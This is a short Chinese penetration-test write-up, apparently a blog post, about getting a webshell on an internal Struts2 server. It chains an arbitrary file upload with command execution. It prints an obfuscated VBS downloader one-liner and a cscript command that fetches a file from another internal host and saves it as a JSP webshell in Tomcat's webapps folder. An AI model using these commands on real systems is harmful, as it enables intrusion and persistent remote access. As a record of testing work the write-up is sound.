前言
在項目中拿到一個比較有意思的shell。在此記錄一下。
struts漏洞
拿眼一打,struts2框架。工具嘗試掃描,果然存在漏洞。
image.png
但是確無法使用該工具的上傳功能。猜測應該是權限不夠導致的。
文件上傳
在登錄系統后發現一處文件上傳。
image.png
測試發現可進行任意文件上傳。上傳jsp馬試試
image.png
emmm。好像沒有配置java環境,且不在同一臺服務器。
嘗試上傳txt文本文件
image.png
訪問一下。
image.png
確定是jsp馬。
現在條件是:無法連接外網、有文件上傳漏洞、命令執行漏洞。
怎么拿shell呢?
思路:利用命令執行powershell或vbs從192.168.40.13的服務器下載到192.168.40.21(不知為何powershell沒有成功)
vbs一句話下載payload
1.echo命令輸出創建downfile.vbs文件。
注意轉義
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
2.downfile.vbs從192.168.40.13服務器下載文件到192.168.40.21服務器
cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp
image.png
下載的txt文件重命名為jsp一句話木馬
ok?。?!嘗試訪問
image.png
Nice?。。?/p>
image.png